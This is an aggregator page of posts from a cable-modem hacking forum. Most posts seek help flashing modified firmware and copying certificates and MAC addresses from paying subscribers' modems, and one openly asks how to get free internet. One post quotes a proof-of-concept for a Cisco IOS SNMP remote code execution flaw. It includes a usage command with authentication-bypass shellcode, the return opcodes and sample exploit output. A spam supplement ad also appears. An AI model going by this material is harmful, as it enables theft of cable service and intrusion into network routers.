Quantcast
Channel: Haxorware Forums - All Forums
Viewing all 4350 articles
Browse latest View live

Linksys

$
0
0
Is there a way to make haxoware witout blackcat? only with software ?

Thanks!

Tftp Client::GetReply: (Tftp Client) Timed out on socket select!

It's been about 7 years..

$
0
0
I am lost and need help finding my way home please

OC CALIFORNIA LOOKING LIKE

SB5101 Certs on a SB6120

$
0
0
Hi! I have a SB6120 with forceware 1.4b1. I've been trying to get it to work for a few days with working certs from my sb5101 (faster speeds). I followed the tutorial on how to get the certs from the nonvol with cmnonexp.exe, rename them and then get them in the sb6120 via winscp.
Based on the tutorial rename them:
non01_public.key -> mfg_key_pub.bin
non01_private.key -> cm_key_prv.bin
non01_root.key -> root_pub_key.bin
non01_ca_cert.cer -> mfg_cert.cer
_cert.cer igual.

But my modem had:
fw_key_prv.bin <=
fw_cert.cer <=
root_pub_key.bin
mfg_cert.cer

Which is the right way to raname them? this is what Im getting in the log "Decrypt Auth Key: Couldn't format PKCS#8 private key into PKCS#1 format"
Thanks in advanced.

SBG901 Latest Firmware?

$
0
0
Does anybody have or know where I can find the latest firmware for a SBG901?

Here is what mine currently has: SBG901-2.1.2.0-GA-02-188-NOSH

Thanks in advance

haxorware on sbg6580 !

$
0
0
May be i am way behind to catch up with all you guys. But just curious how can I start to install haxorware or forceware on sbg6580 which has firmware SBG6580-6.5.2.0-GA-06-NOSH

Hope someone may help me out. Thanks ya !

Orange 3.1 modem

$
0
0
I have a orange arris docsis 3.1 modem.
It’s brand new. It had two holes cutout on top for headers. When I try to connect my computer to it, it doesn’t get a ip, and yes the coax isn’t connected. Any thoughts??
I’m trying to post pics, but the forum won’t let me upload anything over a meg...

flashcat usb pro

$
0
0
hi all, firstly merry xmas to all, right, my question is: im looking to buy a nand reader/writer, I have seen the flashcat usb pro with nand adapter and thinking of buying one of these to communicate with arris tg2492lg, I have seen a few on fleabay and there are that many different adaptors which one do I get? is there an adapter I can get where I can solder it to the chip itself without having to remove the nand as my soldering skills are pretty good but removing and replacing the nand is something I don't want to try without the proper equipment, I also have usbjtagnt, and a rpi3, are there any adaptors for these I can use to read nand? andy m said I can use a xbox 360 nand reader/writer to do the nand on this board but don't want to go and buy one if nobody can confirm this, which one should I buy???
and thanks for reading this

Firmware 1202 motorola

$
0
0
Hi Guys , can you guys help me please.... i want to change my firmware on motorola1202 is there a way to do it witout cables? only with software, script or something?

Cisco IOS SNMP RCE PoC

$
0
0
Quote:CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution
This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - https://tools.cisco.com/security/center/...70629-snmp

Description
RCE exploit code is available for Cisco Integrated Service Router 2811. This exploit is firmware dependent. The latest firmware version is supported:

Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
ROM Monitor version:

System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)
Read-only community string is required to trigger the vulnerability.

Shellcode
The exploit requires shellcode as HEX input. This repo contains an example shellcode for bypassing authentication in telnet service and in enable prompt. Shellcode to revert changes is also available. If you want to write your own shellcode feel free to do so. Just have two things in mind:

Don't upset the watchdog by running your code for too long. Call a sleep function once in a while.
Return execution flow back to SNMP service at the end. You can use last opcodes from the demo shellcode:
3c1fbfc4 lui $ra, 0xbfc4
37ff89a8 ori $ra, $ra, 0x89a8
03e00008 jr $ra
00000000 nop
Usage example
$ sudo python c2800nm-adventerprisek9-mz.151-4.M12a.py 192.168.88.1 public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb6000000000000​3c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000​
Writing shellcode to 0x8000f000
.
Sent 1 packets.
0x8000f0a4: 8fb40250 lw $s4, 0x250($sp)
.
Sent 1 packets.
0x8000f0a8: 00000000 nop
.
Sent 1 packets.
0x8000f0ac: 3c163e29 lui $s6, 0x3e29
.
Sent 1 packets.
0x8000f0b0: 36d655b0 ori $s6, $s6, 0x55b0
Notes
Firmware verson can be read via snmpget command:

$ snmpget -v 2c -c public 192.168.88.1 1.3.6.1.2.1.1.1.0

SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright © 1986-2016 by Cisco Systems, Inc.
Compiled Tue 04-Oct-16 03:37 by prod_rel_team
Author
Artem Kondratenko https://twitter.com/artkond

https://github.com/artkond/cisco-snmp-rce

force_cfgfile

$
0
0
FORCE the use of non-vol specified config file!...
Starting Tftp of configuration file...
TFTP server index 0 IP: x.x.x.x
Opening file 'cm.bin' on x.x.x.x for reading...

CM/NonVol/CM DOCSIS NonVol> [23:32:17 12/22/2017] [CmDocsisIpThread] Tftp Client::GetReply: (Tftp Client) Timed out on socket select!
[23:32:17 12/22/2017] [CmDocsisIpThread] Tftp Client::Send: (Tftp Client) Attempt #(1) Backoff (1) Exp Block #(1) Last Block #(0) Recv'd Block #(0)

CM/NonVol/CM DOCSIS NonVol> [23:32:19 12/22/2017] [CmDocsisIpThread] Tftp Client::GetReply: (Tftp Client) Timed out on socket select!
[23:32:19 12/22/2017] [CmDocsisIpThread] Tftp Client::Send: (Tftp Client) Attempt #(2) Backoff (2) Exp Block #(1) Last Block #(0) Recv'd Block #(0)

CM/NonVol/CM DOCSIS NonVol> [23:32:23 12/22/2017] [CmDocsisIpThread] Tftp Client::GetReply: (Tftp Client) Timed out on socket select!
[23:32:23 12/22/2017] [CmDocsisIpThread] Tftp Client::Send: (Tftp Client) Attempt #(3) Backoff (4) Exp Block #(1) Last Block #(0) Recv'd Block #(0)


This is for using force_cfgfile + dhcp_settings. Local tftp ip doesn't seem to work.

Anyone know how to autoserve config like haxorware in broadcom shell with telnet commands?

anyone have any wisconsin bins ?

$
0
0
need full flash for wis 6121/6141/6580

Sb5101 eBay deal 1.1 v39

$
0
0
Purchased sb5101 with latest greatest but new to this. I've been reading this forum plus just in general online. But not 1000% getting everything but I have spectrum in nc. Signed up for service with them but says they no longer support docs 1.0 or 1.1 modems so does that make this modem useless for me or is it just saying we now require u to have this modem or better but will still work on they network.

New to this Help got a sb5101

$
0
0
Im new to this whole thing i have a sb5101 currently use spectrum but Im reading alot of info. but i have a sb5101 with haxoware 1.1 v39 and i can log in and have it running docsis 1.1 everything set im getting online because im getting the time warner activation page just modem isnt supported as they approved modems anymore But My question is if im reading this correct i need Certificates.. I read something about a certificate sniffer or program that searches and finds certificates and then u upload to modem and then change modem info to match certificate info.
Can someone point me to some post or info on what i need and where to find it to Find certificates and or view certificates.. Its alot of info to take in. and not understand it all.

Arris 6141 Foreware

$
0
0
Hey guys i don't know if you guys can help. Just flashed my 6141 set up everything goes online with stock Cert then i changed my Modem Mac to paid Modem's mac and im getting a PERM AUTH FAILURE. I know it means mac doesn't match cert. IM USING WOW. I have a 5101 with haxorware and it goes online with same MAC but only on DOCSIS 2.0. If i download certs from HAXORWARE and upload to FORCEWARE will that work? i know my account is new but i was on SB hacker for years my user name was thegreat5o had tons of posts. Any help will be greatly appreciated.

https://www.oralhealthplus.com/tryvexan/

$
0
0
tryvexan a lot of men having trouble mutually their sex and training life. No greater depression on ebb results from other sloppy supplements. tryvexan is a fast fashion to improve ready everything in a man’s life. What is tryvexan?tryvexan Review tryvexan wants you to “get rapid to be a powerful” man. This dietary correspondent is offered as a trial.
https://www.oralhealthplus.com/tryvexan/

Arris 6141 Foreware

$
0
0
Hey guys i don't know if you guys can help. Just flashed my 6141 set up everything goes online with stock Cert then i changed my Modem Mac to paid Modem's mac and im getting a PERM AUTH FAILURE. I know it means mac doesn't match cert. IM USING WOW. I have a 5101 with haxorware and it goes online with same MAC but only on DOCSIS 2.0. If i download certs from HAXORWARE and upload to FORCEWARE will that work? i know my account is new but i was on SB hacker for years my user name was thegreat5o had tons of posts. Any help will be greatly appreciated.

Help me

$
0
0
Hello im trying to learn how to get free internet can someone please help me please
Which modem should i purchase .

I need full backup Arris CM820 and Ubee u10c056

$
0
0
Please, i need a full backup Arris CM820 and Ubee DDM352.1 (U10C056), thanks in advance...
Viewing all 4350 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>